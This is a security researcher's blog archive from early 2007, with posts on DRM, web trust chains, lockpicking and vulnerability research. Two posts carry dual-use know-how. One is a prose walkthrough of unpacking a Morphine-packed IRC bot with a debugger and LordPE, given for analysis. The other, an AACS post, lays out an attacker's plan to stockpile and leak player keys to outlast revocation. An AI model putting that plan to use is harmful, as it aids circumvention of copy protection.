Update: Whoops! I was wrong. I found the right report, and I did get some hits from the old-style affiliate links. I put a link somewhere, and two people bought a book based on that. I have earned 83 cents this year so far. Thank you for the support. ;)

"Art of Software Security Assessment, The"

Just got a new post in my RSS feed from the authors' blog for "The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities". Justin Schuh says that InformIT has their book on sale at a significant savings. I did some cursory checking, and InformIT does seem to have the best price. Ground shipping was free, so my total (after adding tax) was $35.88. Not bad. Amazon wants list price for it, so don't by it there.

I've been meaning to buy this book since it came out. This offer seemed like a good reason to get around to doing that. Obviously, since I'm just now buying it, I can't offer a review. However, a number of people whose opinions on this topic I respect, like Dave Aitel, and the Matasano guys, indicate that it is well worth reading.

I'll try and get a proper review in, but my reading backlog is already comically long. But mostly I wanted to point out that this looks like a cool book, and if you're going to buy it, do so at this price.

Update: Uh oh, I got an email that it is backordered. "We strive to fill backorders within 30 days. If we are unable to ship your backordered item(s) within that time frame, we will cancel the item(s) on backorder and you will receive an e-mail confirmation of the cancellation." Good thing I'm not in a hurry. I hope I didn't talk anyone into wasting their time waiting if it's not going to come.

Update 2: It arrived on Feb. 19. The guys posted a blog entry about the delays. I suspect they have the stock straightened out now.

Friday, February 02, 2007

Opening cars with a tennis ball

Watch this video of a woman opening a locked car with a tennis ball. Brought to my attention in a Digg post.

Like a lot of people in my business, I do a little lockpicking, though I'm not particularly good at it. I'm curious if anyone knows exactly what is going on in this particular car door lock. I'm curious if the wafers and sidebar are being pressed into place by the air pressure, or if the air is actuating the lock pull linkage, or what.

MoAB to the BillG

You know your month of bugs is good when Bill Gates is out there pimping them for you.

Hey Bill, are you daring people to do a MoVB?

Thursday, February 01, 2007


I, for one, am outraged at the ridiculous over-reaction of the Boston authorities to what amounts to a battery-powered litebrite

Wait, I can get the bomb squad to come detonate things by attaching LEDs to them?

I can tie up the entire police force of a major metropolitan city for an entire day with a $100 worth or parts from Radio Shack? Completely distracting them from anything else that might be planned for that day?

Wait wait... I can get national news coverage on every major news outlet, and get away with it by just not admitting it was me in the first place?

Carry on.

Friday, January 19, 2007

Web of trust

I continue to add little bits of other people's Javascript on the side of my blog. I just added some code from Technorati. Earlier, I added a hit tracker from Sitemeter and am publishing my RSS feed via Feedburner. The Technorati and Sitemeter things are raw Javascript includes. Oh, and I've started using Zooomr pictures, more Javascript. I haven't added the dozen "pick me!" buttons from Digg et al, yet. But I'm not ruling it out in the future. I don't plan to turn on the ads, but that's just more of the same.

The point is, if you want to 0wn my readers, just compromise Blogger, Technorati, Sitemeter, Zoomr or Feedburner. Or maybe something they depend on. Then you can hand out all of the browser exploits in my name you want.

It's not like attacking one site to compromise another has never been done, or that I haven't been targeted before. I'm just saying.

Web 2.0 is looking a lot like a huge interconnected chain of transitive trust. See also: myspace.

Thursday, January 11, 2007

AACS crack update

So I made some bad assumptions in my earlier post about the AACS crack. That's what I get for assuming and not hunkering down to read the spec. I know more about it now because of today's Freedom to Tinker post from J. Alex Halderman. He explains:
Blacklisting would be a PR and business disaster if it meant a lot of consumers had to throw away their fancy players as a result of a crack. That’s why AACS allows each individual player to be assigned its own unique set of device keys that can be uniquely blacklisted without adversely affecting other players.
So, the AACS people are smarter than I gave them credit for. If manufacturers follow recommendations and issue individual keys to each device, then only one person's device is disabled, and there's a good chance that person was involved in leaking the key, so maybe that's appropriate. Further, Halderman says that they only disable new discs with the revocation, and they don't brick the device. Hm, I guess they are nicer than I might be in their situation. ;)

Halderman refers to the process as "some serious crypto wizardry." Now, I still haven't read the spec, and he has. But I don't see why this should be significantly more complicated than the whole CA/PKI arrangement. The AACS guys probably are a master CA, the licensees are sub-CAs, and they issue a private key/cert pair to each device. When there's a leak, the AACS people can surgically revoke the leaked set.

Does this change the end game? I don't think so. Halderman talks about some possible things like a title key-issuing oracle. Sounds like too much trouble to me. Here's how I think I might do it:
  • Put in the hard work to find some software or hardware device that I know how to recover the keys from; leak those keys, and only the one set
  • At my leisure, stock up as many other keys as I think I'm going to need
  • Wait for the script kiddies to complain that Star Trek XV won't work with my keys
  • Leak the next set
I could stock up dozens or hundreds of keys, and they are probably good for months at a time. They are good until someone releases a HD DVD that anyone cares about.

Other potential problems that I foresee popping up:
  • Maybe I flood the Internet with tons of keys. The revocation list gets large and unwieldy. Maybe discs start to fill up, maybe players take forever to parse through them.
  • I don't expect the software players to cut a key for every single user, especially if it's like current DVD player software that gets thrown in the box of every Dell computer. They don't want to cut custom CDs, and I assume these keys are all too long to type in from a printed label. On the contrary, the Internet would work fine for some soft of "activation" scheme which gets you a key set right then and there. The problem with that is that you now have a website that essentially cuts keys for you at will, and they have their CA private key stored somewhere where it could get stolen.
  • I don't expect every Taiwanese hardware manufacturer to do what they are supposed to, and they will reuse player keys
  • Someone could leak or steal a CA keyset
  • There might be a crypto break like with CSS
  • And last but not least, how about I keep my keys to myself, and just release the decrypted movies?
(And as a disclaimer, I remind people that why I say "I" here, I'm writing from the point of view of a resourceful attacker. As a further disclaimer and future excuse, I still haven't read the AACS spec yet. I guess I need to get on that now.)

Wednesday, January 10, 2007

Testing Zooomr

Please stand by, I'm trying to see how Zooomr works with Blogger.

Here's a picture of part of one of my bookshelves:

OK, looks like Blogger really wants you to limit things to sizes that work with their layout. I guess I'll be sticking to small sizes that you can blow up by clicking on.

Now, to see why Zooomr doesn't store the original size... Ah, OK once you have a Pro account, it looks like you get to keep the original size, too.

Also, it would be ungenerous of me to not point out that Zooomr is giving away free Pro accounts for something as simple as posting a pic like this on your blog.

Unpacking I

Recently, I was given a copy of a piece of malware by Curt Wilson. He had unpacked it in memory, but wasn't quite sure how to finish the process in order to load it up again for further analysis. As a simple howto, and as a way to keep a few notes for myself, I'm documenting the unpacking process.

The sample in question was found as upnp.exe on disk. Looking at it, it was packed with Morphine. I don't personally consider knowing which packer it is ahead of time to be critical, though there are a couple of exceptions. First, if I know it is UPX packed, then I may just try using the latest UPX to unpack it. It works maybe half the time. The other half, there are UPX "corrupters" out that there will break that, and there is at least one packer designed to look somewhat like UPX. Second, there are a couple of packer out there that are probably easily beyond my skill level, and I wouldn't bother trying. The two I can think off of the top of my head are both written by Nicolas Brulez.

If you want to find out what packer was used, you can usually get an answer from PEiD, or by trying the VirusTotal service. Here is the VirusTotal analysis of upnp.exe, for example. Both of those correctly identify this as Morphine, though I got through the hard part of the unpacking without knowing that.

The basic unpacking technique is to execute the program with a debugger until the original binary (or as much as is left) is uncompressed in memory, and then you dump the copy in memory. Usually, when you dump it you also fix the imports so that your analysis tool will know which functions are being called. I'll show you an example in a moment. For a somewhat more advanced example, you can watch a video where Nicolas does an unpack on a binary that has more than one packer used on it, each with multiple antidebugging tricks. This was from a talk we gave at RECON.

First thing, the warnings: If you choose to try to unpack malware, you are taking a chance that you will make a mistake, and just run the thing. If you do this on a real production machine, you will be sad, and infected. If you're smart, you will have a sacrificial machine you can do this on, that you can restore to a known state with no place for the malware to hide. VMWare is popular, though unfortunately, a lot of malware now checks to see if it is running in a VM and shuts down.

The strictest AV guys will also tell you that it is irresponsible to do any analysis on a non-isolated machine, because there's a good chance you will spread it further. If you work on a non-isolated machine and people find out, there's a chance that some or all AV companies will never employ you. That may not seem like much of a threat, but you never know who Symantec or McAfee are going to buy next.

In other words, do as I say, not as I do. When you press the wrong button in your debugger, and run the malware all the way, you will find yourself very interested in finishing the analysis in a hurry in order to find out what you've just done to your machine. You should also know which cable to pull in a hurry to disconnect yourself from the Internet.

So, on with the debugging. Load the program in your favorite debugger. I like to use the debugger now built into IDA Pro. Another popular (and free) debugger is Ollydbg. With both, you need to set an initial breakpoint, and then run the program. Generally speaking, what you will be doing is stepping through the code until you get to the point where you think you've hit the original packed binary, then you leave it paused.

This is the easiest place to screw up. For one, in both debuggers, the step, step over, and run keys are all next to each-other. If you fat-finger the keypress, you just infected your machine. Also, you may encounter antidebugging tricks. I can't say I noticed any with Morphine, but I have certainly seen them with others. Even if you're single-stepping, if you miss accounting for an antidebugger trick, you may find that the program finishes executing without you.

One of the things that pretty much all packers do is to replace a certain portion of the OS's loader. For Windows, this almost always means replacing the portion that takes care of loading and mapping the imports. So, if you are tracking through packer code, you will see the packer calling LoadLibrary and GetProcAddress, in a loop. Packers also almost always compress and/or obfuscate the binary code, so there's also going to be some loops where it is iterating over memory segments. These memory segments are usually create by calling VirtualAlloc.

I bring this up, because you really, really want to step over these functions and not waste time stepping through them or trying to follow them into the kernel. You will also need to become adept at spotting loops. You will need to skip those most of the time, just because they will be too tedious to step through manually. Yet another place to screw up.

Here's an example of something I can spot from experience:

You see where it's pushing a bunch of bytes in the ASCII range onto the stack, and then calling something? Let me decode it to make it a little easier to read:


Read the function names backwards. This tells me I'm in the beginning stages of restoring the imports. Then it calls VirtualAlloc:


And you trace through some loops where it is importing all the libraries and fixing up pointers to the functions.

Eventually, you will arrive at something like this:


There is often a telltale "JMP EAX" or "CALL EAX", or similar. Step one more instruction, and you're at the Original Entry Point (OEP). This is when you're unpacked, or as much as you're going to be. If you trace much farther, you start initializing things, and you might start causing trouble for your analysis. This is what it looks like when we're at the OEP:


I usually like to take note of the OEP and the last address before the OEP. I like to set a hardware breakpoint on execute at one or both of those. In this case, the OEP isn't mapped to a memory segment until after the program has run some portion of the way through the packer, so I set it on the last address before the OEP, and save the database. That way, if I have trouble with the dump step, I can replay right up to that point without having to manual step it again. That works in this case (Morphine) but not in all cases. Sometimes you have to account for antidebugger tricks along the way.

Now that you're at the OEP, you need to dump the binary in memory. I've used two tools for this, Import Reconstructor (imprec) and LordPE. Before I get into the technical details on each, I should talk about the reason I ended up putting this post together.

I was having some trouble getting a good dump of upnp.exe. Specifically, I had traced it to the OEP as I have described, but I couldn't get imprec to dump it properly. The imports table wouldn't come out right. That's when I went to Jason Geffner for help. Jason is another of these guys who is better at reverse engineering than I am. I met him originally in the class I took from Nicolas Brulez. Jason was taking it too, but he didn't really need it.

Jason wanted told me to just use LordPE. He said that Morphine ended up rebuilding the original PE file in memory, and that LordPE did a perfect dump. He even made a screenshot of what settings I should use:

Sure enough, I used LordPE and it dumped perfectly. I'd had good luck with imprec before. Nicolas had shown me the tool in his class. Before that I had been doing raw memory dumps and manually naming offsets. No fun. So I've had a tendency to reach for imprec because I'm used to it.

But, there was no arguing with the fact that LordPE worked for me in this case, and imprec didn't. So part of what I planned to do with this post was to recommend LordPE. So I repeated the steps on my home machine so I could take screenshots and so on. When I got to the step where I was going to show the bad dump made by imprec... I found that it had dumped it perfectly.

Thinking back, I believe why imprec didn't work before was because I had done it on a work machine, which was Windows XP x64. When I tried to use imprec on the 64-bit Windows, I had a problem with some of the imports not being valid. That probably had to do with why it wasn't writing out the import table properly. I had removed the "bad" imports, but it probably just broke the process. I think I was able to use LordPE on the same machine, but now I'm going to have to go back and check.

Which brings me to a general point about tools. If you've got tools you use that did into the guts of a system, then those tools are probably going to quit working when you move to a newer system. This is especially true of tools for which development has ceased (which seems to be the case with imprec.) If it's not being actively maintained, then it will eventually "expire" when the OS moves on. On my home machine, which is regular XP, imprec still works fine. Further, malware and packers tend to account for popular tools by implementing countermeasures. So, if you plan to keep up on reverse engineering, you should also plan to keep looking for the latest and greatest tools.

But in any case, my thanks to Jason for encouraging me to check out LordPE and for fixing my mistake. Back to the techie bits.

I'll skip the imprec demo for now. If you're interested in me spelling out the same steps for imprec, leave me a comment, and I'll write it up. In LordPE, you basically run the tool, find the process you still have paused at the OEP in your debugger, right-click it and select dump full:

In this particular case at least, you now have a good copy of the unpacked executable, and you can load it up in your favorite analysis tool:

If you're curious, the binary is a fairly typical call-home-to-an-IRC-C&C bot.

  • Sorry about the pictures, the arrangement isn't ideal. If you click on one, you can drill down a couple of levels and see the full size so you can read it. I'll probably try tweaking the pictures to work a bit better. Any Blogger and/or Zooomr advice is welcome.
  • I realize I've got a weird mix of beginner and advanced topics here. Sorry about that. Again, this is at least partially to remind myself as well. If you liked the post and want me to take the tech level up or down, let me know. It probably won't be hard to talk me into writing about it more.
  • Both Nicolas and Jason teach this topic as a training attached to security conferences. Nicolas teaches it at RECON. I don't know for sure yet if Nicolas will be teaching this year. Jason has taught at Black Hat, but it doesn't look like the Black Hat training schedule for this year has been announced yet either. I'll post an update if I find out anything about either of them teaching again.

Tuesday, January 09, 2007

Voicemail from bureau of prisons

I walked into the office this morning, and glanced at my phone. It said I had 7 new callers since I left yesterday. Now, I'm not much of a phone person. I hate them. I think that comes from a brief stint I did on the help desk phones at Bechtel.

So, most people know not to call me. I scrolled through the caller-ID list, and there were 6 calls from the same number within about a hour. The number didn't look familiar. Curious, I checked my voicemail, which is something else I rarely do. A man identified himself as being from the IT department of the bureau of prisons, said he had a question for me about a request from an inmate for a book that I wrote the foreword for, and would I please call him.

Uh, sure.

Turns out that someone had put in a request for How to Own a Continent. His opening question was "This isn't fiction, is it?". I explained that it IS fiction, in that none of the events happened, but that we try to keep the technical details real. So yes, it's half fiction, and half technical book. By the time I had called him, he had already taken note of the price and where it is supposed to be shelved, and decided on his own that it didn't qualify as a novel. He made it sound like he had a copy in front of him, which I guess he wasn't planning to forward to the inmate.

I feel a little bad for the inmate who probably won't get to see it now, but I wasn't going to lie about it. I didn't try to grill the prison IT guy, or argue with him about his policies. I figure that was probably pretty futile. Maybe I'll call him back at some point and see if there's anything he is allowed to tell me about which prison this is or the name of the inmate. I assume he can't, but you never know.

If the inmate in question ever sees this: When you get out, or if you transfer somewhere where they are a little more lenient about your reading material, I'll get you a copy.

Monday, January 08, 2007

Eight year old ActiveX control with vulnerability

Tan Chew Keong recently found an ActiveX control on his Acer laptop that allows for arbitrary file execution. I had read this a month or so go, but was reminded again by today's Slashdot story. I haven't looked into the technical details, but they seem pretty plain.

If this is in fact from 1998, then I am amazed by how long this thing has gone unnoticed.
I'd love to know how many copies of this thing are out in the world. I would hope not a lot for escaping notice for so many years.

I can't decide if this is evidence against many eyes, or evidence for the idea that less popular software doesn't get any attention.

AACS Cracked?

It seems that AACS has been reported to be "cracked". Someone by the name of muslix64 claims to have created a program that:
is a tool to decrypt a AACS protected movie that you own, so you can play it back later using an HDDVD player software.
He also says right up front that it's not complete as-is:
This software don't provide any cryptographic keys, so you have to add your own keys.
There used to be a video on YouTube that showed it being used, I imagine. I haven't seen the video. The link to the YouTube now shows:
This video has been removed at the request of copyright owner Warner Bros. Entertainment Inc. because its content was used without permission
If it's not clear, I haven't looked at this too hard. While it's interesting on some levels, I'm not interested in digging into the tech details just yet.

What I find interesting is some of the reactions.

Freedom to Tinker:
Typical users can’t extract title keys on their own, so BackupHDDVD won’t be useful to them as it currently stands — hence the claims that BackupHDDVD is a non-event.

Slashdot (comments):
the very clever fellow just implemented that publicly available decryption routine, and also discovered an (as of yet unreleased) method for obtaining decryption keys.
Yes, and the Engadget article that is TFA is mistaken... He didn't supply any keys, just disc IDs (to map to human readable names of the discs). The place where the keys would have been were all stubbed out with all nulls.

If this is a crack for the DRM, then GPG is a crack for PGP.
For the record, there was some confusion about whether the program shipped with any decryption keys or not. The Freedom to Tinker guys say no, I'll take their word for it.

Now, the Freedom to Tinker guys certainly know the score, and I hope I'm not making it look otherwise by quoting them out of context. But the general feeling from some portion of the people reading about this is that it isn't a proper crack; it doesn't come with keys. They can't use it.

They're missing the point, and what the guy is up to.

The people who complain that they can't use it without keys are also likely going to need a GUI app that rips HD DVDs to MPEG files with a single big green button. As near as I can tell without trying it myself, this program looks something like a GUI with a button. Just add keys.

So, where do you get keys? You get them from existing players, either hardware, firmware, or software. Who knows how to do that? Well, I could probably figure it out, if I had enough time. Please note that I'm not offering to find keys for you, I'm just saying that there are lots of us who do reverse engineering, who could probably figure it out.

So, the programmer attempts to keep the most controversial piece of his code modular and updatable. Other people can supply the keys. Maybe he even hopes that he can escape some trouble by not having it be fully functional out of the box. I wish him luck with that, though it's not without precedent. There are a number of MP3 rippers that don't directly include the patented MP3 codec, and they require you to go find a copy of the LAME libraries which do. The CD ripper programs say they don't include the codec, and the LAME project says you may need a license for your ripper. I tend to think that the MP3 patent holders have just decided to be nice about it.

A few points to make:

Is it in any way surprising that AACS is cracked/decodable/implemented in a program that doesn't play the MPAA's way? Not, not at all. It's inevitable. That's the basic problem with DRM. They give you a file that you're not supposed to be able to decode or decrypt. And then they hand you a decoder. Sure, they are hoping you won't look inside. But people are curious, and they like to be able to store their files on their own terms.

Is this a "crack" in the proper sense of the word? Well, when I was a kid, "cracking" meant removing copy protection from floppy disks. So in that sense, yes, this is a proper crack. It's working around the little trick that is supposed to keep you from doing things the easy way. Now, if you're talking about something like cracking the security of a program (finding a vulnerability) or "cracking" a crypto algorithm (better term is "break"), then no, this is not that kind of crack.

But that's not how you break DRM. You break DRM exactly like this guy did, by replicating the algorithm and/or keys. Sure, if there is ALSO a software vulnerability or bad crypto, that's interesting too. That happened with CSS, for example (crypto weakness.) but you don't need that to get around DRM. You just need to replicate the function of the player.

Frankly, when I simultaneous learned about this AACS crack and that there are a couple of existing Windows HD DVD players, it was obvious what happened. If you want to keep a secret, do not stick it in a Windows program. Reverse engineers LOVE to take apart Windows programs. If you're going to try and simultaneously keep a secret, and distribute it to every household in the world, then at least stick it in a secret ROM chip so that the likes of a Bunnie Huang are needed to get it out.

So why is this different than PGP? because you don't encrypt something with PGP, and then give a copy of the decryption key to everyone in the world, and ask them not to look. It wouldn't matter if every HD DVD came encrypted to your personal key either, since you have no incentive at all to keep the movie encrypted. What do you care if you give out the plaintext version of a movie?

So, what happens now? Well, the AACS designers aren't all that stupid, they were aware this would happen. So there is a key revocation feature out there. This is where my ignorance kicks in. I don't know exactly how this feature works, but I'm going to make some educated guesses.

There must be some set of keys in a Windows HD DVD player or physical device. I'm sure the AACS people issue a set to every vendor or manufacturer. The goal of the evil hax0r here is to swipe those keys, and probably give them to their buddies or post them on the Internet. So the AACS people figure out which keys have been leaked, and they revoke them. I'm guessing that on the next Disney DVD is a revocation list which the players will obey.

Now, does that mean if the evil hax0rs stole the keys from a Panasonic HD DVD player, that the AACS people have to disable that player? Is it all Panasonic devices, or just that model, or just North American versions of that model, or what? The exact details probably aren't important. I think what it means is that yes, some legitimate Panasonic owner buys a legitimate DVD, and next thing they know, their player is bricked.

Can they seriously be planning to do that? I can't see any plan where they can simultaneous cause the bad guys any significant trouble, and avoid screwing innocent customers.

And that's why DRM sucks.

Wednesday, January 03, 2007

Vulnerability Pimps

Marcus Ranum has written a very interesting article about code review, secure coding, Fortify, and vulnerability pimps. The meat of his article is about code review, and there are some real lessons to be learned there. You should take his comments to heart, and implement the review processes he recommends. I know I'm going to look into Fortify now.

There are also some interesting minor insights into Marcus' history. Love him or hate him, you should always pay attention to what Marcus has to say. He graciously added an RSS feed to his site at my request, so please use it.

That said, what I can't let go is "vulnerability pimps". I know, story of his life. He tries to tell people things, and they can only pay attention to his politics. Sorry about that, Marcus.

So, yeah, vulnerability pimps. That's awesome. I'm sure he means for it to be pejorative, but for the folks he is describing, I can't see them taking too much offense. I can see the rise of the purple hat hackers even now.

It's the first time I've heard the term, though maybe he didn't coin it. Google says that Rodney Thayer (at least) used it in 2005. I see Marcus using it in February. Of course, Google doesn't know everything, so I'm happy to take corrections. I can't help but think of this as a Ranumism, though.

As for my politics, I could be accused of encouraging, facilitation, and participating in vulnerability research. Though, not with as much skill as most other vulnerability pimps.

I'll keep my counterpoint brief. Marcus throws out the "many eyes" catchphrase, specifically calling it a failure in the face of his findings. If one does not like independent vulnerability research taking place, then where do you think the checks that Fortify performs come from? If the developers and companies aren't going to look, who else will? If you expect the few eyes to be able to see, where are those eyes going to train?

To be fair to Marcus, he just did the same thing himself. In fact, if I wanted to be extremely ungenerous, I could put him in the same category as the kid who just got a new fuzzer and went looking for problems. But he doesn't deserve that.

The difference for him, as he points out, is that he thinks there's no benefit to touting his findings, (presumably) not even after the patch is out. He reports that everyone was cool, and they are going to get the fix out Real Soon Now. So he can get the problem fixed without the fanfare.

I invite Marcus to finish the experiment, and give us a update later about the following:
  • Let us know if you will be taking credit for the finds.
  • Explain how pimping Fortify by searching for vulns in other people's software is different than eEye doing it to pimp Blink.
  • Tell us how long it takes the programmers to release the patch
  • Tell us whether the programmers properly acknowledge that this update fixes a security problem, and that people should update right away
  • Tell us if you spend the extra time to check that the patch correctly fixes the problem you identified